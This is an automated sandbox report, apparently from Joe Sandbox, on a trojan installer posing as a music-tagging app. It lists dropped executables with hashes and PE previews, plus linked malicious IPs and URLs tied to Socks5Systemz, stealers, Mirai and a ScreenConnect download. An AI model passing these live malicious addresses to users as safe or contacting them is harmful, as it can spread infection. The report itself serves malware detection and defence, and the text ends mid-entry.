            Number of analysed new started processes analysed:7
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:file.exe
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@7/27@1/2
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 92%
            • Number of executed functions: 201
            • Number of non-executed functions: 254
            Cookbook Comments:
            • Found application associated with file extension: .exe

            Warnings

            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Report size getting too big, too many NtDeviceIoControlFile calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            12:09:25API Interceptor366347x Sleep call for process: metatoggermusiccollection.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            45.142.214.240qY7gbJZZEg.exeGet hashmaliciousSocks5SystemzBrowse
              4sFJbsYtlZ.exeGet hashmaliciousSocks5SystemzBrowse
                JkzAVzO10i.exeGet hashmaliciousSocks5SystemzBrowse
                  30BoW8L6li.exeGet hashmaliciousSocks5SystemzBrowse
                    TLjPBsFGBA.exeGet hashmaliciousSocks5SystemzBrowse
                      TsJIjW3BGG.exeGet hashmaliciousSocks5SystemzBrowse
                        TmL1QoijLY.exeGet hashmaliciousSocks5SystemzBrowse
                          MdDTnpwLpW.exeGet hashmaliciousSocks5SystemzBrowse
                            Ht3cChAW7m.exeGet hashmaliciousSocks5SystemzBrowse
                              qI6GAdt66c.exeGet hashmaliciousSocks5SystemzBrowse
                                89.105.201.183SecuriteInfo.com.Trojan.PackedNET.2742.9443.15673.exeGet hashmaliciousGlupteba, Mars Stealer, Socks5Systemz, Stealc, VidarBrowse

                                  Domains

                                  No context

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  ALEXHOSTMDhttps://airdrop-online-altlayer-anniversary.s3.us-east-2.amazonaws.com/posten.html?cid=freetomfr@hotmail.comGet hashmaliciousPhisherBrowse
                                  • 176.123.0.55
                                  Mcb5K3TOWT.exeGet hashmaliciousUnknownBrowse
                                  • 176.123.3.222
                                  https://zoneimport.g3639.gleeze.com:8443/Bin/ScreenConnect.WindowsBackstageShell.exeGet hashmaliciousUnknownBrowse
                                  • 176.123.10.70
                                  https://zoneimport.g3639.gleeze.com:8443/Bin/support.Client.exe?h=zoneimport.g3639.gleeze.com&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQC9E418YcI0GPCt6nL8JLXCrMVf52TCL6876nxAnRhTrORKZpQBP%2FOOMq8NyfwADFO5Cd84vRpMcQXSF3WH9nDCENT7s9bnfsiMfr4yv2tN2F2pLViDwga%2FKmuJQ4nHCHKP3ZiHxALI%2FiYFsUB3U7Kh29d9UfQXfO7h7RT3qvsSgosh64UPscMDajPw31sWFKkqxCX6dxsugjZn2HG3HyKdxKwdMqtEMkric02HfEdRRYE4tgBiOoxJ6Qqe%2F3Y6QGqI3ll8CZCAoPErr6Nyf%2F0mXkzkoUzaEZZ2ybUwNOgyikyAdK5HCgvcTJX%2BO4XTPvCcRTaQ8kadfT5nmEpZD7OS&s=8ca74fb1-50aa-4e0c-8369-bef89caa9168&i=Untitled%20Session&e=Support&y=Guest&r=Get hashmaliciousScreenConnect ToolBrowse
                                  • 176.123.10.70
                                  qY7gbJZZEg.exeGet hashmaliciousSocks5SystemzBrowse
                                  • 45.142.214.240
                                  4sFJbsYtlZ.exeGet hashmaliciousSocks5SystemzBrowse
                                  • 45.142.214.240
                                  JkzAVzO10i.exeGet hashmaliciousSocks5SystemzBrowse
                                  • 45.142.214.240
                                  30BoW8L6li.exeGet hashmaliciousSocks5SystemzBrowse
                                  • 45.142.214.240
                                  TLjPBsFGBA.exeGet hashmaliciousSocks5SystemzBrowse
                                  • 45.142.214.240
                                  TsJIjW3BGG.exeGet hashmaliciousSocks5SystemzBrowse
                                  • 45.142.214.240
                                  NOVOSERVE-ASNLSecuriteInfo.com.Trojan.PackedNET.2742.9443.15673.exeGet hashmaliciousGlupteba, Mars Stealer, Socks5Systemz, Stealc, VidarBrowse
                                  • 89.105.201.183
                                  https://zoom-download.picsGet hashmaliciousUnknownBrowse
                                  • 89.105.201.222
                                  sora.arm.elfGet hashmaliciousMiraiBrowse
                                  • 80.89.243.97
                                  tyF5uZFTm6.elfGet hashmaliciousMiraiBrowse
                                  • 80.89.243.91
                                  XUIn1BoRmN.elfGet hashmaliciousMiraiBrowse
                                  • 80.89.243.99
                                  IEEi5d6RYUGet hashmaliciousMiraiBrowse
                                  • 80.89.243.93
                                  home.x86_64Get hashmaliciousMiraiBrowse
                                  • 80.89.243.98
                                  home.mips-20220723-2320Get hashmaliciousGafgyt, MiraiBrowse
                                  • 80.89.243.94
                                  mips-20220704-2102Get hashmaliciousMiraiBrowse
                                  • 80.89.243.93
                                  jzeufDzhs4Get hashmaliciousMiraiBrowse
                                  • 80.89.243.92

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  C:\Users\user\AppData\Local\Metatogger Music Collection\is-6VPG9.tmpi1crvbOZAP.exeGet hashmaliciousAmadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                    qY7gbJZZEg.exeGet hashmaliciousSocks5SystemzBrowse
                                      4sFJbsYtlZ.exeGet hashmaliciousSocks5SystemzBrowse
                                        JkzAVzO10i.exeGet hashmaliciousSocks5SystemzBrowse
                                          30BoW8L6li.exeGet hashmaliciousSocks5SystemzBrowse
                                            TLjPBsFGBA.exeGet hashmaliciousSocks5SystemzBrowse
                                              TsJIjW3BGG.exeGet hashmaliciousSocks5SystemzBrowse
                                                TmL1QoijLY.exeGet hashmaliciousSocks5SystemzBrowse
                                                  MdDTnpwLpW.exeGet hashmaliciousSocks5SystemzBrowse
                                                    Ht3cChAW7m.exeGet hashmaliciousSocks5SystemzBrowse
                                                      C:\Users\user\AppData\Local\Metatogger Music Collection\is-2EOVT.tmpi1crvbOZAP.exeGet hashmaliciousAmadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                        qY7gbJZZEg.exeGet hashmaliciousSocks5SystemzBrowse
                                                          4sFJbsYtlZ.exeGet hashmaliciousSocks5SystemzBrowse
                                                            JkzAVzO10i.exeGet hashmaliciousSocks5SystemzBrowse
                                                              30BoW8L6li.exeGet hashmaliciousSocks5SystemzBrowse
                                                                TLjPBsFGBA.exeGet hashmaliciousSocks5SystemzBrowse
                                                                  TsJIjW3BGG.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    TmL1QoijLY.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      MdDTnpwLpW.exeGet hashmaliciousSocks5SystemzBrowse
                                                                        Ht3cChAW7m.exeGet hashmaliciousSocks5SystemzBrowse

                                                                          Created / dropped Files

                                                                          C:\ProgramData\WWAN_MobileFixup 2.33.197.66\WWAN_MobileFixup 2.33.197.66.exe

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1853204
                                                                          Entropy (8bit):7.097039022655032
                                                                          Encrypted:false
                                                                          SSDEEP:24576:MpHpU1XpkfxgVpDRpGTpbi8p/Qup0dwJewzk+xfergEEMo947gNSqeB8xivxB1Lt:MR2pUxgV1RwT/xQu6dw0wQ+xY9VF72A
                                                                          MD5:CC6DE23FFDBD2BC10F9CFD9E44659A2D
                                                                          SHA1:418C982C63DA06773421F92266BADA86761701EB
                                                                          SHA-256:B7DFAAFB460D5AB8F2F0CE0FA5F12833EAAF20AAE9A9919A5EB83743EAF4FE1A
                                                                          SHA-512:9DAC3574E65E2F172620FBAA591E464C1331479480F2F5A25ABE6FFE52A9A8544222D219E84E8C72F4334B2D18053B62DA76C8EFAE2A3F5A45CC95D9311EED8B
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          Reputation:low
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....G.^..........*...............................@..........................p..............................................L...x.......................................................................................l............................text............................... ..`.rdata...'.......0..................@..@.data...xU... ...@... ..............@....rsrc................`..............@..@_char2_......p.......P..............a...........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\ProgramData\rc66.dat

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):4
                                                                          Entropy (8bit):0.8112781244591328
                                                                          Encrypted:false
                                                                          SSDEEP:3:E:E
                                                                          MD5:14791D7C7467A6BB2F140BCAF8B145F4
                                                                          SHA1:44127D404CAAB816C2DDB4644A9B9FA6BCCC429D
                                                                          SHA-256:4A11C2997424CD7A381ECA1948DD4C442CB4B2A8086B676ECF67EFF032EAACEC
                                                                          SHA-512:0E342BD795A6B44B88CFC8DC3EFCFCAB0F77C44C4BDF943E94C838FBC416FB26FAEFD2F0D6CC9FE86DAC39C251D35AEDF0B8EF87D7C1ACB88DF6032E2C674970
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:i...

                                                                          C:\ProgramData\resource-a.dat

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):128
                                                                          Entropy (8bit):2.9545817380615236
                                                                          Encrypted:false
                                                                          SSDEEP:3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
                                                                          MD5:98DDA7FC0B3E548B68DE836D333D1539
                                                                          SHA1:D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
                                                                          SHA-256:870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
                                                                          SHA-512:E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................

                                                                          C:\ProgramData\resource-b.dat

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):128
                                                                          Entropy (8bit):1.2701231977328944
                                                                          Encrypted:false
                                                                          SSDEEP:3:WAmJuXDz8/:HHzc
                                                                          MD5:0D6174E4525CFDED5DD1C9440B9DC1E7
                                                                          SHA1:173EF30A035CE666278904625EADCFAE09233A47
                                                                          SHA-256:458677CDF0E1A4E87D32AB67D6A5EEA9E67CB3545D79A21A0624E6BB5E1087E7
                                                                          SHA-512:86DA96385985A1BA3D67A8676A041CA563838F474DF33D82B6ECD90C101703B30747121A6B7281E025A3C11CE28ACCEDFC94DB4E8D38E391199458056C2CD27A
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:ccddf9e705966c2f471db9..........................................................................................................

                                                                          C:\ProgramData\ts66.dat

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):8
                                                                          Entropy (8bit):2.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:8Dll/:85t
                                                                          MD5:499E1B783576DBE7AC7AAF790755C813
                                                                          SHA1:099C55F6EA301C88E0FA803E40BD99FF953E2D06
                                                                          SHA-256:57B2FF1FB01C3647CFE413DF6539ADD7F9E663BC6687324011DD6195FC744534
                                                                          SHA-512:B34B93000C0041126F793497D1BA2CBD697FD9980E97D7C2A6F7AB458BADD6EB95F79DE17AB13ECCEDBB41D82C6449EE6E29ED4B58ED7ADAF9A540C107C6D8AA
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:...f....

                                                                          C:\Users\user\AppData\Local\Metatogger Music Collection\is-2EOVT.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):105784
                                                                          Entropy (8bit):6.258144336244945
                                                                          Encrypted:false
                                                                          SSDEEP:1536:2VpMEh4vFu4sry2jkEw0D2cXTY+sgmX18CGLganGc:2Vai3yjEw0DNX03gmqCOD3
                                                                          MD5:0C6452935851B7CDB3A365AECD2DD260
                                                                          SHA1:83EF3CD7F985ACC113A6DE364BDB376DBF8D2F48
                                                                          SHA-256:F8385D08BD44B213FF2A2C360FE01AE8A1EDA5311C7E1FC1A043C524E899A8ED
                                                                          SHA-512:5FF21A85EE28665C4E707C7044F122D1BAC8E408A06F8EA16E33A8C9201798D196FA65B24327F208C4FF415E24A5AD2414FE7A91D9C0B0D8CFF88299111F2E1D
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: i1crvbOZAP.exe, Detection: malicious, Browse
                                                                          • Filename: qY7gbJZZEg.exe, Detection: malicious, Browse
                                                                          • Filename: 4sFJbsYtlZ.exe, Detection: malicious, Browse
                                                                          • Filename: JkzAVzO10i.exe, Detection: malicious, Browse
                                                                          • Filename: 30BoW8L6li.exe, Detection: malicious, Browse
                                                                          • Filename: TLjPBsFGBA.exe, Detection: malicious, Browse
                                                                          • Filename: TsJIjW3BGG.exe, Detection: malicious, Browse
                                                                          • Filename: TmL1QoijLY.exe, Detection: malicious, Browse
                                                                          • Filename: MdDTnpwLpW.exe, Detection: malicious, Browse
                                                                          • Filename: Ht3cChAW7m.exe, Detection: malicious, Browse
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........@......#...#.2...................P.....b......................................@... .................................................................@............................k......................<................................text...d0.......2..................`.P`.data...l....P.......6..............@.`..rdata..L....`.......D..............@.`@/4....... ......."...\..............@.0@.bss....P.............................`..edata...............~..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Metatogger Music Collection\is-6VPG9.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):125637
                                                                          Entropy (8bit):6.2640431186303145
                                                                          Encrypted:false
                                                                          SSDEEP:3072:lRvT0WUWJXNEn9bufmWAHE9pQIAOBmuWR2:DT0WU6E9Kfms9p5guWc
                                                                          MD5:6231B452E676ADE27CA0CEB3A3CF874A
                                                                          SHA1:F8236DBF9FA3B2835BBB5A8D08DAB3A155F310D1
                                                                          SHA-256:9941EEE1CAFFFAD854AB2DFD49BF6E57B181EFEB4E2D731BA7A28F5AB27E91CF
                                                                          SHA-512:F5882A3CDED0A4E498519DE5679EA12A0EA275C220E318AF1762855A94BDAC8DC5413D1C5D1A55A7CC31CFEBCF4647DCF1F653195536CE1826A3002CF01AA12C
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: i1crvbOZAP.exe, Detection: malicious, Browse
                                                                          • Filename: qY7gbJZZEg.exe, Detection: malicious, Browse
                                                                          • Filename: 4sFJbsYtlZ.exe, Detection: malicious, Browse
                                                                          • Filename: JkzAVzO10i.exe, Detection: malicious, Browse
                                                                          • Filename: 30BoW8L6li.exe, Detection: malicious, Browse
                                                                          • Filename: TLjPBsFGBA.exe, Detection: malicious, Browse
                                                                          • Filename: TsJIjW3BGG.exe, Detection: malicious, Browse
                                                                          • Filename: TmL1QoijLY.exe, Detection: malicious, Browse
                                                                          • Filename: MdDTnpwLpW.exe, Detection: malicious, Browse
                                                                          • Filename: Ht3cChAW7m.exe, Detection: malicious, Browse
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........,.....&#...$.d.........................n.........................`............@... .........................u.... ..x............................P....................................................... ...............................text...8b.......d..................`.P`.data...(............h..............@.0..rdata...".......$...j..............@.`@/4.......4.......6..................@.0@.bss..................................0..edata..u...........................@.0@.idata..x.... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Metatogger Music Collection\is-7CP2O.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):176200
                                                                          Entropy (8bit):6.647007817777345
                                                                          Encrypted:false
                                                                          SSDEEP:1536:9teve4OMTqM/iKAo+/zO9RhR9aPTxRm1TxStoBtwIbaU+yUsXxTTLRazIxSp/FjU:ze24OM+M/bAWK9Rm1NXwIl+/I9RtqIn
                                                                          MD5:6896DC57D056879F929206A0A7692A34
                                                                          SHA1:D2F709CDE017C42916172E9178A17EB003917189
                                                                          SHA-256:8A7D2DA7685CEDB267BFA7F0AD3218AFA28F4ED2F1029EE920D66EB398F3476D
                                                                          SHA-512:CD1A981D5281E8B2E6A8C27A57CDB65ED1498DE21D2B7A62EDC945FB380DEA258F47A9EC9E53BD43D603297635EDFCA95EBCB2A962812CD53C310831242384B8
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........8......#...#.b........................tm......................... ......z.....@... .........................E....................................................................w.......................................................text....a.......b..................`.P`.data...P............f..............@.P..rdata...............h..............@.`@/4...............0...Z..............@.0@.bss..................................0..edata..E...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..............................@.0B................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Metatogger Music Collection\is-7EQGF.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):1853204
                                                                          Entropy (8bit):7.097038847389474
                                                                          Encrypted:false
                                                                          SSDEEP:24576:lpHpU1XpkfxgVpDRpGTpbi8p/Qup0dwJewzk+xfergEEMo947gNSqeB8xivxB1Lt:lR2pUxgV1RwT/xQu6dw0wQ+xY9VF72A
                                                                          MD5:6476CEDDC8C769258E88D80A26B424D0
                                                                          SHA1:07AFEFF8B37411E77554FD40A8B9897A7E6CA1A5
                                                                          SHA-256:EB796CE1BDE0BEB3DFAC6109A9229CD946403F7D932DF8979BF44C6A18B5B6B1
                                                                          SHA-512:9A7E4103BF2FACFFCBBB81E16BCB7C5818E0888E276A2B1BA6247BA943CFFD76B9BD3EF14AB93A384854B5E47FC08B1F33F131862EDF343983D182BC3E4BB24C
                                                                          Malicious:false
                                                                          Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....G.^..........*...............................@..........................p..............................................L...x.......................................................................................l............................text............................... ..`.rdata...'.......0..................@..@.data...xU... ...@... ..............@....rsrc................`..............@..@_char2_......p.......P..............a...........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Metatogger Music Collection\is-B2M6R.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):704282
                                                                          Entropy (8bit):6.476114986803567
                                                                          Encrypted:false
                                                                          SSDEEP:12288:dhg/qrLc0yVrPg37AzHqA63JJVndjzrN6IRpO9+u1nWXExydK:o/qrQ0yVrPg37AzHqA6Zfn093NWXExyM
                                                                          MD5:4F22DFEEA2A871E85C620A3A85A06D36
                                                                          SHA1:47CBC1D887AEF7F4F1F3460967FBA4180DDA154E
                                                                          SHA-256:2D529D076A78BEC4EC6C0DAF805BD19087E01E1D9CC8E1F1107B8CCEB8D12E4F
                                                                          SHA-512:5F80087EF9A1C064AF5EAE5AC0D3BEFA75650874D2952054B040F31C6C161BD3324D084108EF1F6DEA00CFBFD55FB449A78DBDB2CE6CA150ED392C44AF20CC29
                                                                          Malicious:true
                                                                          Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................,).......0....@..............................................@...........................`...%...@...>..........................................................................................................CODE....\........................... ..`DATA.........0....... ..............@...BSS..........@.......0...................idata...%...`...&...0..............@....tls.................V...................rdata...............V..............@..P.reloc..l...........................@..P.rsrc....>...@...>...X..............@..P....................................@..P........................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Metatogger Music Collection\is-JTEEN.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):125637
                                                                          Entropy (8bit):6.2640431186303145
                                                                          Encrypted:false
                                                                          SSDEEP:3072:lRvT0WUWJXNEn9bufmWAHE9pQIAOBmuWR2:DT0WU6E9Kfms9p5guWc
                                                                          MD5:6231B452E676ADE27CA0CEB3A3CF874A
                                                                          SHA1:F8236DBF9FA3B2835BBB5A8D08DAB3A155F310D1
                                                                          SHA-256:9941EEE1CAFFFAD854AB2DFD49BF6E57B181EFEB4E2D731BA7A28F5AB27E91CF
                                                                          SHA-512:F5882A3CDED0A4E498519DE5679EA12A0EA275C220E318AF1762855A94BDAC8DC5413D1C5D1A55A7CC31CFEBCF4647DCF1F653195536CE1826A3002CF01AA12C
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........,.....&#...$.d.........................n.........................`............@... .........................u.... ..x............................P....................................................... ...............................text...8b.......d..................`.P`.data...(............h..............@.0..rdata...".......$...j..............@.`@/4.......4.......6..................@.0@.bss..................................0..edata..u...........................@.0@.idata..x.... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Metatogger Music Collection\is-OSHRA.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):40974
                                                                          Entropy (8bit):6.485702128133584
                                                                          Encrypted:false
                                                                          SSDEEP:768:kB8JMzjwsTYQgUvXtrs7GtUplYj7SG7MLXm:kmMwsTYwvXhZP77SW
                                                                          MD5:F47E78AD658B2767461EA926060BF3DD
                                                                          SHA1:9BA8A1909864157FD12DDEE8B94536CEA04D8BD6
                                                                          SHA-256:602C2B9F796DA7BA7BF877BF624AC790724800074D0E12FFA6861E29C1A38144
                                                                          SHA-512:216FA5AA6027C2896EA5C499638DB7298DFE311D04E1ABAC302D6CE7F8D3ED4B9F4761FE2F4951F6F89716CA8104FA4CE3DFECCDBCA77ED10638328D0F13546B
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...!.F...................`.....p......................... ......I5........ .................................................................@...........................L........................................................text....E.......F..................`.P`.data...0....`.......J..............@.0..rdata..$&...p...(...L..............@.`@/4......<............t..............@.0@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Metatogger Music Collection\is-QO8P8.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):68552
                                                                          Entropy (8bit):6.1042544770100395
                                                                          Encrypted:false
                                                                          SSDEEP:768:Jd8ALXCfP6bO/XfLCwiWBot9ZOGLuNTizPm3YRiFVinPHF:X8fq+X9OjZ2APm3YeinPl
                                                                          MD5:F06B0761D27B9E69A8F1220846FF12AF
                                                                          SHA1:E3A2F4F12A5291EE8DDC7A185DB2699BFFADFE1A
                                                                          SHA-256:E85AECC40854203B4A2F4A0249F875673E881119181E3DF2968491E31AD372A4
                                                                          SHA-512:5821EA0084524569E07BB18AA2999E3193C97AA52DA6932A7971A61DD03D0F08CA9A2D4F98EB96A603B99F65171F6D495D3E8F2BBB2FC90469C741EF11B514E9
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...$...........................d................................Y_....@... ..............................0..t....`..P....................p..............................`........................1..H............................text..............................`.P`.data...L...........................@.0..rdata..............................@.0@/4......,3.......4..................@.0@.bss..................................0..edata..............................@.0@.idata..t....0......................@.0..CRT....0....@......................@.0..tls.........P......................@.0..rsrc...P....`......................@.0..reloc.......p......................@.0B........................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Metatogger Music Collection\libbz2-1.dll (copy)

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):105784
                                                                          Entropy (8bit):6.258144336244945
                                                                          Encrypted:false
                                                                          SSDEEP:1536:2VpMEh4vFu4sry2jkEw0D2cXTY+sgmX18CGLganGc:2Vai3yjEw0DNX03gmqCOD3
                                                                          MD5:0C6452935851B7CDB3A365AECD2DD260
                                                                          SHA1:83EF3CD7F985ACC113A6DE364BDB376DBF8D2F48
                                                                          SHA-256:F8385D08BD44B213FF2A2C360FE01AE8A1EDA5311C7E1FC1A043C524E899A8ED
                                                                          SHA-512:5FF21A85EE28665C4E707C7044F122D1BAC8E408A06F8EA16E33A8C9201798D196FA65B24327F208C4FF415E24A5AD2414FE7A91D9C0B0D8CFF88299111F2E1D
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........@......#...#.2...................P.....b......................................@... .................................................................@............................k......................<................................text...d0.......2..................`.P`.data...l....P.......6..............@.`..rdata..L....`.......D..............@.`@/4....... ......."...\..............@.0@.bss....P.............................`..edata...............~..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Metatogger Music Collection\libgcc_s_dw2-1.dll (copy)

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):125637
                                                                          Entropy (8bit):6.2640431186303145
                                                                          Encrypted:false
                                                                          SSDEEP:3072:lRvT0WUWJXNEn9bufmWAHE9pQIAOBmuWR2:DT0WU6E9Kfms9p5guWc
                                                                          MD5:6231B452E676ADE27CA0CEB3A3CF874A
                                                                          SHA1:F8236DBF9FA3B2835BBB5A8D08DAB3A155F310D1
                                                                          SHA-256:9941EEE1CAFFFAD854AB2DFD49BF6E57B181EFEB4E2D731BA7A28F5AB27E91CF
                                                                          SHA-512:F5882A3CDED0A4E498519DE5679EA12A0EA275C220E318AF1762855A94BDAC8DC5413D1C5D1A55A7CC31CFEBCF4647DCF1F653195536CE1826A3002CF01AA12C
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........,.....&#...$.d.........................n.........................`............@... .........................u.... ..x............................P....................................................... ...............................text...8b.......d..................`.P`.data...(............h..............@.0..rdata...".......$...j..............@.`@/4.......4.......6..................@.0@.bss..................................0..edata..u...........................@.0@.idata..x.... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Metatogger Music Collection\libogg-0.dll (copy)

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
